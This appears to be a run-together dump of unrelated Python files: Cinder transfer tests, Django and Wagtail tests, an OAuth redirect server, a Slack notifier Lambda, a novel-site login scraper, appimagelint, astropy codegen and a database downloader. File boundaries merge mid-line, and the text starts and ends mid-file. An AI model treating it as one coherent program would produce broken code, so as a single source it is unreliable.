updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume['id'], 'Description') t = tx_api.get(self.ctxt, transfer['id']) self.assertEqual(t['id'], transfer['id'], 'Unexpected transfer id') ts = tx_api.get_all(self.ctxt) self.assertEqual(1, len(ts), 'Unexpected number of transfers.') nctxt = context.RequestContext(user_id=fake.USER2_ID, project_id=fake.PROJECT2_ID) utils.create_volume(nctxt, updated_at=self.updated_at) self.assertRaises(exception.TransferNotFound, tx_api.get, nctxt, transfer['id']) ts = tx_api.get_all(nctxt) self.assertEqual(0, len(ts), 'Unexpected transfers listed.') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_delete_transfer_with_deleted_volume(self, mock_notify): # create a volume volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) # create a transfer tx_api = transfer_api.API() transfer = tx_api.create(self.ctxt, volume['id'], 'Description') t = tx_api.get(self.ctxt, transfer['id']) self.assertEqual(t['id'], transfer['id'], 'Unexpected transfer id') calls = [mock.call(self.ctxt, mock.ANY, "transfer.create.start"), mock.call(self.ctxt, mock.ANY, "transfer.create.end")] mock_notify.assert_has_calls(calls) self.assertEqual(2, mock_notify.call_count) # force delete volume volume.destroy() # Make sure transfer has been deleted. self.assertRaises(exception.TransferNotFound, tx_api.get, self.ctxt, transfer['id']) @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_with_snapshots(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) utils.create_volume_type(self.ctxt.elevated(), id=fake.VOLUME_TYPE_ID, name="test_type") utils.create_snapshot(self.ctxt, volume.id, status='available') transfer = tx_api.create(self.ctxt, volume.id, 'Description') # Get volume and snapshot quota before accept self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID usages = db.quota_usage_get_all_by_project(self.ctxt, self.ctxt.project_id) self.assertEqual(0, usages.get('volumes', {}).get('in_use', 0)) self.assertEqual(0, usages.get('snapshots', {}).get('in_use', 0)) tx_api.accept(self.ctxt, transfer['id'], transfer['auth_key']) volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual(fake.PROJECT2_ID, volume.project_id) self.assertEqual(fake.USER2_ID, volume.user_id) calls = [mock.call(self.ctxt, mock.ANY, "transfer.accept.start"), mock.call(self.ctxt, mock.ANY, "transfer.accept.end")] mock_notify.assert_has_calls(calls) # The notify_about_volume_usage is called twice at create(), # and twice at accept(). self.assertEqual(4, mock_notify.call_count) # Get volume and snapshot quota after accept self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID usages = db.quota_usage_get_all_by_project(self.ctxt, self.ctxt.project_id) self.assertEqual(1, usages.get('volumes', {}).get('in_use', 0)) self.assertEqual(1, usages.get('snapshots', {}).get('in_use', 0)) @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_with_snapshots_invalid(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) utils.create_volume_type(self.ctxt.elevated(), id=fake.VOLUME_TYPE_ID, name="test_type") utils.create_snapshot(self.ctxt, volume.id, status='deleting') self.assertRaises(exception.InvalidSnapshot, tx_api.create, self.ctxt, volume.id, 'Description') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') @mock.patch.object(db, 'volume_type_get', v2_fakes.fake_volume_type_get) @mock.patch.object(quota.QUOTAS, 'reserve') def test_transfer_accept_with_detail_records(self, mock_notify, mock_type_get): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') self.assertEqual(volume.project_id, transfer['source_project_id']) self.assertIsNone(transfer['destination_project_id']) self.assertFalse(transfer['accepted']) # Get volume and snapshot quota before accept self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID tx_api.accept(self.ctxt, transfer['id'], transfer['auth_key']) xfer = db_api.model_query(self.ctxt, models.Transfer, read_deleted='yes' ).filter_by(id=transfer['id']).first() self.assertEqual(volume.project_id, xfer['source_project_id']) self.assertTrue(xfer['accepted']) self.assertEqual(fake.PROJECT2_ID, xfer['destination_project_id']) from rest_framework.test import APITestCase,APIClient from django.urls import reverse from django.contrib.auth.models import User from django.contrib.auth.hashers import make_password from .models import Patient from customer.models import Customer import datetime import json class PatientTestCase(APITestCase): """ Test normal creating user procedural. """ def setUp(self): self.client = APIClient() user = User(username='',email='', password=make_password('/.,')) user.save() self.customer = Customer(user=user) self.customer.save() hacker_user = User(username='',email='',password=make_password('/.')) hacker_user.save() self.hacker = Customer(user=hacker_user) self.hacker.save() login_data = { 'email':'', 'password':'/.,' } login_url = reverse('customer_login') login_response = self.client.post(login_url,login_data,format='json') self.assertEqual(login_response.status_code,200) self.customer_id = json.loads(login_response.content)['customer_id'] def test_create_patient(self): # print(self.client.cookies) for i in range(3): payload = { 'customer_id':self.customer_id, 'first_name':'demo%d'%i, 'last_name':'patient%d'%i, 'first_name_pinyin':'pin%d'%i, 'last_name_pinyin':'yin%d'%i, 'gender':0, 'birthdate':datetime.date.today(), 'relationship':0, 'passport':'12345' } url = reverse('patient-list',kwargs={'customer_id':self.customer_id}) response = self.client.post(url,payload,format='json') # print(response.content) self.assertEqual(response.status_code,201) # print(Patient.objects.filter(customer_id=self.customer.id)) def test_normal_list(self): self.test_create_patient() url = reverse('patient-list',kwargs={'customer_id':self.customer_id}) response = self.client.get(url) self.assertEqual(response.status_code,200) print(json.loads(response.content)) def test_illegal_list(self): self.test_create_patient() self.client.logout() self.client.force_login(self.hacker.user) url = reverse('patient-list',kwargs={'customer_id':self.customer_id}) response = self.client.get(url) self.assertEqual(response.status_code,403) 0 # Title : TODO # Objective : TODO # Created by: Wenzurk # Created on: 2018/2/2 # message = "One of Python's strengths is its diverse community." # print(message) # message = 'One of Python's strengths is its diverse community.' # print(message)def maximum_no_of_tasks(MaxNActive, waitingPeriod): """maintain a maximum number of active tasks _source: , UNC Postdoc at Global Hydrology Lab, https://github.com/seanyx""" time.sleep(10) ## initialize submitting jobs ts = list(ee.batch.Task.list()) NActive = 0 for task in ts: if ('RUNNING' in str(task) or 'READY' in str(task)): NActive += 1 ## wait if the number of current active tasks reach the maximum number ## defined in MaxNActive while (NActive >= MaxNActive): time.sleep(waitingPeriod) # if reach or over maximum no. of active tasks, wait for 2min and check again ts = list(ee.batch.Task.list()) NActive = 0 for task in ts: if ('RUNNING' in str(task) or 'READY' in str(task)): NActive += 1 return()"""Tests for CMS app API functionality""" import pytest from django.contrib.contenttypes.models import ContentType from wagtail.core.models import Page from wagtail_factories import PageFactory from cms.api import ( ensure_home_page_and_site, get_wagtail_img_src, ensure_resource_pages, ensure_product_index, get_home_page, RESOURCE_PAGE_TITLES, ) from cms.exceptions import WagtailSpecificPageError from cms.factories import HomePageFactory, CoursePageFactory from cms.models import HomePage, ResourcePage, CourseIndexPage, HomeProductLink @pytest.mark.django_db def test_get_home_page(): """ get_home_page should fetch a Page object for the home page or raise exceptions if certain conditions are met """ with pytest.raises(Page.DoesNotExist): get_home_page() assert get_home_page(raise_if_missing=False) is None # Orphaned home page (no HomePage record associated with the Page record orphaned_home_page = PageFactory.create( content_type=ContentType.objects.get_for_model(HomePage) ) with pytest.raises(WagtailSpecificPageError): get_home_page(check_specific=True) assert get_home_page() == orphaned_home_page @pytest.mark.django_db def test_get_home_page_specific(): """ get_home_page should fetch a Page object successfully if check_specific=True and there is a HomePage record associated with that Page """ home_page = HomePageFactory.create() returned_home_page = get_home_page(check_specific=True) assert home_page.page_ptr == returned_home_page @pytest.mark.django_db def test_ensure_home_page_and_site(): """ ensure_home_page_and_site should make sure that a home page is created if one doesn't exist, it is set to be a child of the root, and the default Wagtail page is deleted. """ home_page_qset = Page.objects.filter( content_type=ContentType.objects.get_for_model(HomePage) ) wagtail_default_page_qset = Page.objects.filter( depth=2, content_type=ContentType.objects.get_for_model(Page) ) assert home_page_qset.exists() is False assert wagtail_default_page_qset.exists() is True ensure_home_page_and_site() assert wagtail_default_page_qset.exists() is False home_page = home_page_qset.first() assert home_page is not None home_page_parents = home_page.get_ancestors() assert home_page_parents.count() == 1 assert home_page_parents.first().is_root() is True # Make sure the function is idempotent ensure_home_page_and_site() assert home_page_qset.count() == 1 def test_get_wagtail_img_src(settings): """get_wagtail_img_src should return the correct image URL""" settings.MEDIA_URL = "/mediatest/" img_path = "/path/to/my-image.jpg" img_hash = "abc123" home_page = HomePageFactory.build( hero__file__filename=img_path, hero__file_hash=img_hash ) img_src = get_wagtail_img_src(home_page.hero) assert img_src == f"{img_path}?v={img_hash}" @pytest.mark.django_db def test_ensure_resource_pages(mocker): """ ensure_resource_pages should create resource pages if they don't already exist """ patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=HomePageFactory.create() ) expected_resource_pages = len(RESOURCE_PAGE_TITLES) resource_page_qset = Page.objects.filter( content_type=ContentType.objects.get_for_model(ResourcePage) ) assert resource_page_qset.exists() is False assert resource_page_qset.count() == 0 ensure_resource_pages() patched_get_home_page.assert_called_once() assert resource_page_qset.exists() is True assert resource_page_qset.count() == expected_resource_pages assert sorted( [resource_page.title for resource_page in resource_page_qset] ) == sorted(RESOURCE_PAGE_TITLES) # Make sure the function is idempotent ensure_resource_pages() assert resource_page_qset.count() == expected_resource_pages @pytest.mark.django_db def test_ensure_product_index(mocker): """ ensure_product_index should make sure that a course index page exists and that all course detail pages are nested under it """ home_page = HomePageFactory.create() patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=home_page ) existing_course_page = CoursePageFactory.create(parent=home_page) course_index_qset = Page.objects.filter( content_type=ContentType.objects.get_for_model(CourseIndexPage) ) assert existing_course_page.get_parent() == home_page assert course_index_qset.exists() is False ensure_product_index() patched_get_home_page.assert_called_once() course_index_page = course_index_qset.first() assert course_index_page is not None course_index_children_qset = course_index_page.get_children() assert list(course_index_children_qset.all()) == [existing_course_page.page_ptr] # Make sure the function is idempotent ensure_product_index() assert list(course_index_children_qset.all()) == [existing_course_page.page_ptr] @pytest.mark.django_db def test_home_page_featured_products(mocker): """test home page is loading featured product""" home_page = HomePageFactory.create() patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=home_page ) course_page = CoursePageFactory.create(parent=home_page) # make sure featured products are listing HomeProductLink.objects.create(page=home_page, course_product_page=course_page) featured_products = home_page.products assert len(featured_products) == 1 run = course_page.product.first_unexpired_run assert featured_products == [ { "title": course_page.title, "description": course_page.description, "feature_image": course_page.feature_image, "start_date": run.start_date if run is not None else None, "url_path": course_page.get_url(), } ] @pytest.mark.django_db def test_home_page_featured_products_sorting(mocker): """tests that featured products are sorted in ascending order""" home_page = HomePageFactory.create() patched_get_home_page = mocker.patch( "cms.api.get_home_page", return_value=home_page ) course_pages = CoursePageFactory.create_batch(2, parent=home_page) page_data = [] for course_page in course_pages: HomeProductLink.objects.create(page=home_page, course_product_page=course_page) run = course_page.product.first_unexpired_run page_data.append( { "title": course_page.title, "description": course_page.description, "feature_image": course_page.feature_image, "start_date": run.start_date if run is not None else None, "url_path": course_page.get_url(), } ) page_data = sorted( page_data, key=lambda item: (item["start_date"] is None, item["start_date"]), ) featured_products = home_page.products assert len(featured_products) == 2 assert featured_products == page_data import sys import os sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))) from ssrando import Randomizer from options import Options import time import json def check_logs(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) old_time = time.process_time() rando.logic.randomize_items() print(time.process_time() - old_time) prog_spheres = rando.calculate_playthrough_progression_spheres() with open(f"testlogs/log_{i:02}.json", "r") as f: should_prog_spheres = json.load(f) assert prog_spheres == should_prog_spheres def write_logs(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) old_time = time.process_time() rando.logic.randomize_items() print(time.process_time() - old_time) prog_spheres = rando.logic.calculate_playthrough_progression_spheres() # prog_spheres = rando.calculate_playthrough_progression_spheres() # with open(f'testlogs/log2_{i:02}.json','w') as f: # json.dump(prog_spheres, f, indent=2, sort_keys=True) def test_woth(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) rando.logic.randomize_items() woth_items = {} not_woth_prog = {} # check for every progress item, if it's hard required for loc in rando.logic.item_locations: item = rando.logic.done_item_locations[loc] if item in rando.logic.all_progress_items: if rando.logic.can_finish_without_locations([loc]): not_woth_prog[loc] = item else: woth_items[loc] = item # with open(f'testlogs/log3_{i:02}.json','w') as f: # json.dump({'not':not_woth_prog, 'woth': woth_items}, f, indent=2) def test_barren(): opts = Options() opts.update_from_permalink("rQEAAASmAw==") opts.set_option("dry-run", True) for i in range(5): opts.set_option("seed", i) rando = Randomizer(opts) rando.logic.randomize_items() rando.logic.get_barren_regions() # with open(f'testlogs/log4_{i:02}.json','w') as f: # json.dump(rando.logic.get_barren_regions(), f, indent=2) from onshape_client.compatible_imports import HTTPServer, HTTPHandler, sendable def start_server(authorization_callback, open_grant_authorization_page_callback): """ :param authorization_callback: The function to call once with the authorization URL response :param open_grant_authorization_page_callback: The function to call when the server starts - for example opening a webpage :return: """ ServerClass = MakeServerClass(open_grant_authorization_page_callback) server = ServerClass( ("localhost", 9000), MakeHandlerWithCallbacks(authorization_callback) ) server.serve_forever() def MakeServerClass(open_grant_authorization_page_callback): class OAuth2RedirectServer(HTTPServer, object): def server_activate(self): super(OAuth2RedirectServer, self).server_activate() open_grant_authorization_page_callback() return OAuth2RedirectServer def MakeHandlerWithCallbacks(authorization_callback): class OAuth2RedirectHandler(HTTPHandler): def do_GET(self): try: # Say we are at an https port so that OAuth package doesn't complain. This isn't a security concern because # it is just so that the authorization code is correctly parsed. print("path:"+str(self.path)) authorization_callback(authorization_response="https://localhost" + self.path) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() content = """ Success!

You successfully authorized the application, and your authorization url is: {}

You may close this tab.

""".format( self.path ) self.wfile.write(sendable(content)) except BaseException as e: self.send_response(500) self.send_header("Content-type", "text/html") self.end_headers() content = """ Error!

Something happened and here is what we know: {}

You may close this tab.

""".format( e ) self.wfile.write(sendable(content)) import threading assassin = threading.Thread(target=self.server.shutdown) assassin.daemon = True assassin.start() return OAuth2RedirectHandler # -*- coding: utf-8 -*- def main(): n = int(input()) h = list(map(int, input().split())) if n == 1: print('Yes') exit() for i in range(n - 1, 0, -1): if h[i] >= h[i - 1]: continue else: if h[i] - h[i - 1] == -1: h[i - 1] -= 1 else: print('No') exit() print('Yes') if __name__ == '__main__': main() import json import os from base64 import b64decode import boto3 import requests def sns_message_to_slack(event, context): message = event["Records"][0]["Sns"]["Message"] subject = event["Records"][0]["Sns"]["Subject"] if subject: payload = { "text": subject, "blocks": [ {"type": "section", "text": {"text": message, "type": "mrkdwn"}} ], } else: payload = {"text": message} webhook = ( boto3.client("kms") .decrypt(CiphertextBlob=b64decode(os.environ["ENCRYPTED_SLACK_WEBHOOK"]))[ "Plaintext" ] .decode("utf-8") .strip() ) requests.post(webhook, json=payload) response = {"statusCode": 200, "body": ""} return response Chapter16/cf_rfem_hist_price/venv/lib/python3.6/tempfile.py /home/wai/anaconda3/lib/python3.6/tempfile.pydario-chiappetta/dialogflow_agents """ This module demonstrates the use of intent **relations** to create complex conversation flows. .. note:: Intent relations are under definition, they will be extended in next releases. Let's break down a complex interaction involving :mod:`shop` intents. #. .. code-block:: text U: I want a fish A: What sort of fish do you want? Standard Intent :class:`OrderFish` starts the conversation. .. autoclass:: OrderFish #. .. code-block:: text U: A kipper A: Kipper, good choice. Adding 1 to cart Intent :class:`OrderFishAnswerKipper` follows :class:`OrderFish`. This means that the first can't be predicted if the latter wasn't predicted recently; this makes sense because an utterance like *"a kipper"* would sound really weird without context. Note that :class:`OrderFishAnswerKipper` is a subclass of :class:`OrderKipper`, and therefore inherits its :meth:`OrderKipper.fulfill` method. Check out the **source code** of the intents below to see how the *follow* relation is implemented. .. autoclass:: OrderKipper :members: .. autoclass:: OrderFishAnswerKipper :members: #. .. code-block:: text U: Actually I want more A: How many would you like? :class:`ChangeAmount` follows :class:`OrderKipper`. Since :class:`OrderFishAnswerKipper` is a subclass of :class:`OrderKipper`, our agent can predict :class:`ChangeAmount` at this point of the conversation. However, this intent defines a required parameter :attr:`ChangeAmount.amount`. Since *amount* can't be tagged in the user utterance, the Agent will respond with one of the slot filling prompts for parameter "amount" (see :mod:`intents.language`). .. autoclass:: ChangeAmount :members: #. .. code-block:: text U: 3 please A: Alright, I changed the amount to 3 User fills the slot, and :class:`ChangeAmount` can finally be predicted. .. autoclass:: CartApi :members: """ from dataclasses import dataclass from intents import Intent, Sys, follow # # Helpers # class CartApi: """ A mock API for a Customer cart. In real life, this connects to a service of some sort. """ def add(self, item: str, amount: int): """ Add an item to cart Args: item: Name of the item to add amount: Amount to add """ print(f"If I was real, I'd add {amount} {item} to cart") def update(self, item: str, amount: int): """ Update an item in cart Args: item: Name of the item to update amount: New amount to set """ print(f"If I was real, I'd update the amount of {item} to {amount}") # # Intents # @dataclass class OrderFish(Intent): """ | U: I'd like to buy a fish please | A: What sort of fish would you like? Args: amount: The amount of fish to buy """ lifespan = 3 amount: Sys.Integer = 1 @dataclass class OrderKipper(OrderFish): """ | U: I'd like to buy a kipper | A: Alright, adding 1 kipper to cart Args: amount: The amount of kipper to buy """ def fulfill(self, context, *args): """ Use :class:`CartApi` to add kippers to cart. The amount is specified by :attr:`OrderKipper.amount` """ cart = CartApi() cart.add('kipper', self.amount) @dataclass class OrderFishAnswerKipper(OrderKipper): """ | ("...what sort of fish would you like?") | U: kipper | A: Kipper, good choice Args: amount: The amount of kipper to buy parent_order_fish: The OrderFish intent from context """ parent_order_fish: OrderFish = follow() @dataclass class ChangeAmount(Intent): """ | ("...adding one kipper to cart") | U: actually, make it 2 | A: Sure, 2 kippers for you Args: amount: The new amount of kipper. Note that this overwrites all the other values for parameter "amount" in context, even if they come from other intents parent_order_kipper: The OrderKipper intent from context """ amount: Sys.Integer parent_order_kipper: OrderKipper = follow(new_lifespan=2) def fulfill(self, context, *args): """ Use :class:`CartApi` to update the amount of kippers in cart to :attr:`ChangeAmount.amount` """ cart = CartApi() cart.update('kipper', self.amount) import json import os from pathlib import Path def removeprefix(string, prefix): if string.startswith(prefix): string = string[len(prefix):] return string def removesuffix(string, suffix): if string.endswith(suffix): string = string[:-len(suffix)] return string def convert_path(original_path, data_path): prefix_to_remove = "dumped/mc4_processed_data/" suffix_to_remove = ".bin" return data_path / removesuffix(removeprefix(original_path, prefix_to_remove), suffix_to_remove) def main(): """Write to """ data_path = Path(os.environ["six_ALL_CCFRSCRATCH"]) / "datasets-custom" / "mc4" / "mc4_preprocessing" output_path = Path(os.environ["six_ALL_CCFRSCRATCH"]) / "checkpoints" / "tr5-1B3-multilingual" / "dataset_probabilities.txt" probabilies_path = data_path / "sample_iterator_probs" / "iterator_selection_prob.0.3.train.json" with open(probabilies_path, "r") as fprob: probabilities = json.load(fprob) # Format probabilities dictionary to store path in key and probability as value probabilities = { convert_path(key, data_path): value[0] for key, value in probabilities.items() } with open(output_path, "w") as fout: fout.write(" ".join([f"{prob} {path}" for path, prob in probabilities.items()])) pass if __name__ == "__main__": main() zhongjianru/JinJiangNovelmain/login.py import utils import time import os from selenium import webdriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By cookie_file = './files/cookies.txt' login_url = 'http://my.jjwxc.net/' chap_url = 'http://my.jjwxc.net/onebook_vip.php?novelid=3288706&chapterid=22' # 新增:读取本地 cookies 文件 def read_cookies(): if os.path.exists(cookie_file): with open(cookie_file, 'r+') as f: cookies = f.read() else: with open(cookie_file, 'w+') as f: cookies = '' f.write(cookies) print('reading', cookie_file, '...') return cookies # 测试本地 cookies 是否可用 def test_cookies(cookies): headers = utils.get_headers(cookies) soup = utils.get_url(chap_url, headers=headers) noveltext = '' isvalid = True try: noveltext = soup.select('div.noveltext')[0] except: pass if noveltext == '': isvalid = False return isvalid # 用户登录 def user_login(username, password): # 打开登录页面 opt = webdriver.ChromeOptions() # opt.add_argument('--headless') driver = webdriver.Chrome(options=opt, executable_path='/Users/kinyuchung/Downloads/chromedriver') driver.get(login_url) # 等待页面加载 exp = EC.presence_of_element_located((By.ID, 'jj_login')) wait = WebDriverWait(driver, 60) tar = wait.until(exp) # 登录 btn_login = driver.find_element_by_xpath('//*[@id="jj_login"]') btn_login.click() # 用户名 input_name = driver.find_element_by_id('loginname') input_name.clear() input_name.send_keys(username) # 密码 input_pwd = driver.find_element_by_id('loginpassword') input_pwd.clear() input_pwd.send_keys(password) # 同意用户协议 input_keep = driver.find_element_by_id('login_registerRule') input_keep.click() # 保持登入状态 input_keep = driver.find_element_by_id('cookietime') input_keep.click() time.sleep(2) btn_submit = driver.find_element_by_xpath('//*[@id="login_form"]/ul/div[@id="logininput"]/li[3]/input') btn_submit.click() time.sleep(5) # 访问 vip 章节,获取 cookie driver.get(chap_url) cookie_list = driver.get_cookies() # 格式化打印cookie cookie_dict = {} cookies = '' for one in cookie_list: cookie_dict[one['name']] = one['value'] cookies = cookies + one['name'] + '=' + one['value'] + '; ' cookies = cookies.rstrip('; ') # 写入 cookie with open(cookie_file, mode='w+') as f: f.write(cookies) # 退出浏览器窗口 driver.quit() # 获取可用 cookies def get_cookies(username, password): cookies = read_cookies() isvalid = test_cookies(cookies) if isvalid: print('cookie is valid.') else: print('cookie is invalid, start to login...') user_login(username, password) print('login successfully.', cookie_file, 'write done.') cookies = read_cookies() return cookies import argparse import logging import os import sys from appimagelint.services.checks_manager import ChecksManager from .cache.runtime_cache import AppImageRuntimeCache from .reports import JSONReport from .services.result_formatter import ResultFormatter from .models import AppImage from . import _logging from .checks import IconsCheck, GlibcABICheck, GlibcxxABICheck, DesktopFilesCheck def get_version(): try: import pkg_resources version = pkg_resources.require("appimagelint")[0].version except ImportError: version = "unknown" APPDIR = os.environ.get("APPDIR", None) git_commit = "unknown" if APPDIR is not None: try: with open(os.path.join(APPDIR, "commit")) as f: git_commit = f.read().strip(" \n\r") except FileNotFoundError: pass version += "-git" + git_commit return version def parse_args(): parser = argparse.ArgumentParser( prog="appimagelint", description="Run compatibility and other checks on AppImages automatically, " "and provide human-understandable feedback" ) parser.add_argument("--version", dest="display_version", action="version", version=get_version(), help="Display version and exit" ) parser.add_argument("--debug", dest="loglevel", action="store_const", const=logging.DEBUG, default=logging.INFO, help="Display debug messages") parser.add_argument("--log-source-location", dest="log_message_locations", action="store_const", const=True, default=False, help="Print message locations (might be picked up by IDEs to allow for jumping to the source)") parser.add_argument("--log-timestamps", dest="log_timestamps", action="store_const", const=True, default=False, help="Log timestamps (useful for debugging build times etc.)") parser.add_argument("--force-colors", dest="force_colors", action="store_const", const=True, default=False, help="Force colored output") parser.add_argument("--json-report", dest="json_report", nargs="?", default=None, help="Write results to file in machine-readable form (JSON)") parser.add_argument("--check", dest="check_id", nargs="?", default=None, help="Check to run (default: all)") parser.add_argument("path", nargs="+", help="AppImage to review") args = parser.parse_args() return args def run(): ChecksManager.init() args = parse_args() if getattr(args, "display_version", False): print(get_version()) return # setup _logging.setup( args.loglevel, with_timestamps=args.log_timestamps, force_colors=args.force_colors, log_locations=args.log_message_locations, ) # get logger for CLI logger = _logging.make_logger("cli") # need up to date runtime to be able to read the mountpoint from stdout (was fixed only recently) # also, it's safer not to rely on the embedded runtime custom_runtime = AppImageRuntimeCache.get_data() # results logs are written immediately, but maybe we want to generate additional reports # for this purpose, we collect all results results = {} try: for path in args.path: results[path] = {} logger.info("Checking AppImage {}".format(path)) appimage = AppImage(path, custom_runtime=custom_runtime) kwargs = dict() if args.force_colors: kwargs["use_colors"] = True formatter = ResultFormatter(**kwargs) if args.check_id: checks_ids = [args.check_id] else: checks_ids = ChecksManager.list_checks() for check_id in checks_ids: check = ChecksManager.get_instance(check_id, appimage) logger.info("Running check \"{}\"".format(check.name())) results[path][check] = [] for testres in check.run(): results[path][check].append(testres) check.get_logger().info(formatter.format(testres)) if args.json_report: report = JSONReport(results) report.write(args.json_report) except KeyboardInterrupt: logger.critical("process interrupted by user") sys.exit(2) astropy/utils/codegen.py # -*- coding: utf-8 -*- # Licensed under a 3-clause BSD style license - see LICENSE.rst """Utilities for generating new Python code at runtime.""" import inspect import itertools import keyword import os import re import textwrap from .introspection import find_current_module __all__ = ['make_function_with_signature'] _ARGNAME_RE = re.compile(r'^[A-Za-z][A-Za-z_]*') """ Regular expression used my make_func which limits the allowed argument names for the created function. Only valid Python variable names in the ASCII range and not beginning with '_' are allowed, currently. """ def make_function_with_signature(func, args=(), kwargs={}, varargs=None, varkwargs=None, name=None): """ Make a new function from an existing function but with the desired signature. The desired signature must of course be compatible with the arguments actually accepted by the input function. The ``args`` are strings that should be the names of the positional arguments. ``kwargs`` can map names of keyword arguments to their default values. It may be either a ``dict`` or a list of ``(keyword, default)`` tuples. If ``varargs`` is a string it is added to the positional arguments as ``*``. Likewise ``varkwargs`` can be the name for a variable keyword argument placeholder like ``**``. If not specified the name of the new function is taken from the original function. Otherwise, the ``name`` argument can be used to specify a new name. Note, the names may only be valid Python variable names. """ pos_args = [] key_args = [] if isinstance(kwargs, dict): iter_kwargs = kwargs.items() else: iter_kwargs = iter(kwargs) # Check that all the argument names are valid for item in itertools.chain(args, iter_kwargs): if isinstance(item, tuple): argname = item[0] key_args.append(item) else: argname = item pos_args.append(item) if keyword.iskeyword(argname) or not _ARGNAME_RE.match(argname): raise SyntaxError(f'invalid argument name: {argname}') for item in (varargs, varkwargs): if item is not None: if keyword.iskeyword(item) or not _ARGNAME_RE.match(item): raise SyntaxError(f'invalid argument name: {item}') def_signature = [', '.join(pos_args)] if varargs: def_signature.append(f', *{varargs}') call_signature = def_signature[:] if name is None: name = func.__name__ global_vars = {f'__{name}__func': func} local_vars = {} # Make local variables to handle setting the default args for idx, item in enumerate(key_args): key, value = item default_var = f'_kwargs{idx}' local_vars[default_var] = value def_signature.append(f', {key}={default_var}') call_signature.append(', {0}={0}'.format(key)) if varkwargs: def_signature.append(f', **{varkwargs}') call_signature.append(f', **{varkwargs}') def_signature = ''.join(def_signature).lstrip(', ') call_signature = ''.join(call_signature).lstrip(', ') mod = find_current_module(2) frm = inspect.currentframe().f_back if mod: filename = mod.__file__ modname = mod.__name__ if filename.endswith('.pyc'): filename = os.path.splitext(filename)[0] + '.py' else: filename = '' modname = '__main__' # Subtract 2 from the line number since the length of the template itself # is two lines. Therefore we have to subtract those off in order for the # pointer in tracebacks from __{name}__func to point to the right spot. lineno = frm.f_lineno - 2 # The lstrip is in case there were *no* positional arguments (a rare case) # in any context this will actually be used... template = textwrap.dedent("""{0}\ def {name}({sig1}): return __{name}__func({sig2}) """.format('\n' * lineno, name=name, sig1=def_signature, sig2=call_signature)) code = compile(template, filename, 'single') eval(code, global_vars, local_vars) new_func = local_vars[name] new_func.__module__ = modname new_func.__doc__ = func.__doc__ return new_func artemis/general/test_global_rates.py import itertools import time from artemis.general.global_rates import limit_rate, limit_iteration_rate from artemis.general.global_vars import global_context def test_limit_rate(): with global_context(): start = time.time() for t in itertools.count(0): limit_rate('this_rate', period=0.1) current = time.time() if current - start > 0.5: break print((t, current - start)) assert t<6 def test_limit_rate_iterator(): with global_context(): start = time.time() for t in limit_iteration_rate(itertools.count(0), period=0.1): current = time.time() if current - start > 0.5: break print((t, current - start)) assert t<6 if __name__ == '__main__': test_limit_rate() test_limit_rate_iterator() #!/usr/bin/env python3 import os import sys import subprocess as sp def instantiate_install(db_dir): instantiate_dir(db_dir) get_phrog_mmseqs(db_dir) get_phrog_annot_table(db_dir) get_phrog_hhmer(db_dir) def instantiate_dir(db_dir): if os.path.isdir(db_dir) == False: os.mkdir(db_dir) def get_phrog_mmseqs(db_dir): print("Getting PHROGs MMSeqs DB") filepath = "https://phrogs.lmge.uca.fr/downloads_from_website/phrogs_mmseqs_db.tar.gz" tarball = "phrogs_mmseqs_db.tar.gz" folder = "phrogs_mmseqs_db" # get tarball if not already present if os.path.isfile(os.path.join(db_dir,tarball)) == True: print("PHROGs Database already downloaded") # download tarball and untar else: try: sp.call(["wget", filepath, "-P", db_dir]) except: sys.stderr.write("Error: PHROGs MMSeqs Database not found - link likely broken\n") return 0 # delete folder if it exists already if os.path.isfile(os.path.join(db_dir,folder)) == True: sp.call(["rm", os.path.join(db_dir,folder)]) # download untar -C for specifying the directory sp.call(["tar", "-xzf", os.path.join(db_dir, tarball), "-C", db_dir]) def get_phrog_annot_table(db_dir): print("Getting PHROGs Annotation Table") filepath = "https://phrogs.lmge.uca.fr/downloads_from_website/phrog_annot_v3.tsv" file = "phrog_annot_v3.tsv" #if the file already exists if os.path.isfile(os.path.join(db_dir,file)) == True: print("PHROGs annotation file already downloaded") else: try: sp.call(["wget", filepath, "-P", db_dir]) except: sys.stderr.write("Error: PHROGs annotation file not found - link likely broken\n") return 0 def get_phrog_hhmer(db_dir): print("Getting PHROGs HHmer DB") filepath = "https://phrogs.lmge.uca.fr/downloads_from_website/phrogs_hhsuite_db.tar.gz" tarball = "phrogs_hhsuite_db.tar.gz" folder = "phrogs_hhsuite_db" # get tarball if not already present if os.path.isfile(os.path.join(db_dir,tarball)) == True: 